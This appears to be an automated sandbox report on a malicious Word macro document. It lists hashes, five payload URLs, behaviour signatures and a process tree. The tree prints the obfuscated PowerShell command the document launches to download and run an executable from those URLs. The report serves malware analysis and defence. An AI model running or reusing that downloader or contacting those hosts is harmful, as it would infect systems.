Analysis
max time kernel: 142s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04/04/2024, 04:02
Behavioral task: behavioral1
Sample: af0870e941a776d5efda87418f75870e_JaffaCakes118.doc
Resource: win7-20240221-en
General
Target: af0870e941a776d5efda87418f75870e_JaffaCakes118.doc
Size: 235KB
MD5: af0870e941a776d5efda87418f75870e
SHA1: 4ee9fda5fd9a10b0beff24c15fc73c362a06d12c
SHA256: fcf9e5af91a1e9c9c86995546e2174bbe7125f9a027bcd06106bd8f383a8e414
SHA512: 7a8c5e10051a2e50b59a87fd319aec6f1f1906ae49706574ddce3a85d22730d6647ae359c38822485af958d65df3f880ffc1a3ad9a29b79412c333a9702e38ab
SSDEEP: 3072:qH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5XyXJm9YBmjD+cb+Xa6aeHWlg:qFVeEsjdXRC3jexGG68YWofpAxIlSwC
Malware Config
Extracted URLs:
- http://www.optosvet.com/NZJFq7P/
- http://janeensart.com/cMn6Qso1ny/
- http://www.usugeotechno.com/OLDq8XAVG/
- http://www.qpalconsultancy.com/wp-content/gZPTPm/
- http://vent-postavka.com/0IPz87qOj/
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 2596 | 1208 | powershell.exe | 93

Blocklisted process makes network request (1 IoC)
flow | pid | Process
31 | 2596 | powershell.exe
Downloads MZ/PE file

Executes dropped EXE (4 IoCs)
pid | Process
1664 | 550.exe
2980 | 550.exe
2196 | boxesdetect.exe
4420 | boxesdetect.exe

Drops file in System32 directory (4 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | boxesdetect.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | boxesdetect.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | boxesdetect.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | boxesdetect.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Modifies data under HKEY_USERS (3 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | boxesdetect.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | boxesdetect.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | boxesdetect.exe
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
pid | Process | count
1208 | WINWORD.EXE | 2

Suspicious behavior: EnumeratesProcesses (21 IoCs)
pid | Process | count
2596 | powershell.exe | 3
1664 | 550.exe | 2
2980 | 550.exe | 2
2196 | boxesdetect.exe | 2
4420 | boxesdetect.exe | 12

Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 2596 | powershell.exe

Suspicious use of SetWindowsHookEx (8 IoCs)
pid | Process | count
1208 | WINWORD.EXE | 8

Suspicious use of WriteProcessMemory (11 IoCs)
description | pid | Process | procid_target | count
PID 1208 wrote to memory of 2596 | 1208 | WINWORD.EXE | 99 | 2
PID 2596 wrote to memory of 1664 | 2596 | powershell.exe | 105 | 3
PID 1664 wrote to memory of 2980 | 1664 | 550.exe | 108 | 3
PID 2196 wrote to memory of 4420 | 2196 | boxesdetect.exe | 111 | 3
Processes
(Process tree; the bracketed number is the nesting depth of each process in the tree.)

[1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\af0870e941a776d5efda87418f75870e_JaffaCakes118.doc" /o ""
    PID: 1208
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & ( $SHElLid[1]+$shELLId[13]+'X')( [STRiNg]::joIn('', ([cHaR[]] (1,74, 76 ,104 , 24, 75,64, 82, 8 ,74, 71 , 79 , 64 ,70,81 ,5 , 107 , 64, 81 ,11 ,114 ,64,71 , 102 ,73, 76,64,75 ,81 , 30, 1 ,95, 102 ,124 , 24, 2 , 77 ,81, 81 , 85, 31 , 10, 10 , 82, 82,82,11, 74 ,85 , 81,74, 86, 83 ,64 ,81 ,11 ,70, 74, 72, 10, 107 ,127 ,111, 99 , 84 , 18 ,117 ,10, 101, 77 , 81 , 81 , 85 , 31,10 , 10 , 79,68, 75, 64 , 64, 75, 86 , 68 , 87, 81 ,11,70,74 ,72 , 10 , 70 ,104 , 75 ,19, 116 ,86 , 74 , 20, 75, 92,10 , 101 , 77 , 81,81 , 85, 31 , 10,10,82,82, 82 ,11, 80 , 86,80,66,64,74,81 , 64,70 , 77 , 75 ,74 , 11,70 , 74 ,72,10, 106,105,97, 84 , 29, 125,100 ,115 ,98 ,10 ,101 ,77 ,81 , 81,85 ,31 ,10,10,82 , 82 , 82,11 , 84 ,85 , 68 , 73, 70, 74, 75 ,86,80 , 73 ,81,68 , 75, 70 ,92 , 11 , 70,74 , 72 , 10, 82 , 85,8 , 70 , 74,75, 81 ,64 , 75 , 81,10, 66 , 127 , 117 , 113 , 117 ,72 ,10,101, 77,81,81,85, 31 , 10,10 , 83,64, 75, 81, 8 , 85,74,86 ,81, 68 , 83,78,68 ,11 ,70 ,74 ,72 , 10 ,21 , 108, 117, 95 ,29 , 18 ,84, 106, 79, 10 , 2, 11, 118,85, 73 , 76, 81,13 , 2, 101 ,2,12, 30,1, 79, 79,83, 5 ,24 , 5, 2, 16 , 16,21 ,2,30,1,72 ,82 , 68 ,24 ,1,64, 75 ,83,31 ,81 , 64 , 72 ,85 , 14 ,2, 121,2 , 14 , 1, 79, 79 ,83, 14, 2 , 11,64 ,93,64 ,2 ,30 ,67 ,74 , 87, 64 , 68 ,70,77,13,1 , 112, 81,82, 5,76 , 75, 5,1 ,95, 102 ,124 ,12, 94 ,81 ,87,92 ,94 , 1 ,74, 76,104 , 11 ,97,74,82, 75 ,73 , 74,68 ,65,99, 76 , 73 ,64 , 13 ,1 ,112 , 81 ,82 , 9,5 ,1 , 72,82 ,68,12, 30,118,81, 68 ,87,81 , 8 ,117 , 87 ,74 , 70 ,64 , 86,86, 5,1 , 72,82 , 68 ,30 ,71, 87 ,64 ,68,78, 30 ,88 , 70,68 ,81 , 70,77 , 94 , 88, 88) |fOReaCh-oBJEcT{ [cHaR]($_-BxOr '0x25' ) } ) ) )
      PID: 2596
      - Process spawned unexpected child process
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\550.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\550.exe"
        PID: 1664
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\550.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\550.exe"
          PID: 2980
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\SysWOW64\boxesdetect.exe
    Command line: "C:\Windows\SysWOW64\boxesdetect.exe"
    PID: 2196
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\boxesdetect.exe
      Command line: "C:\Windows\SysWOW64\boxesdetect.exe"
      PID: 4420
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3816 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
    PID: 4336
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
Filesize: 104KB
MD5: f0bb506337373e33321eb5ffa1bf4f7f
SHA1: 4b102e1c43628711cb00b799bd78af70fb6f070f
SHA256: 2162c42b68af7f56590335a0fcead8e19b1b103acdf0bc3d783db17c9c637999
SHA512: a849b8e79861bf573d895dc6b8b0f5977accbbd615c75e3bfc67847aa2effb9a54f2c969178906c2b077e13d85a546384e5eb62e3666ffa87db30bafc70a2884

File 2
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82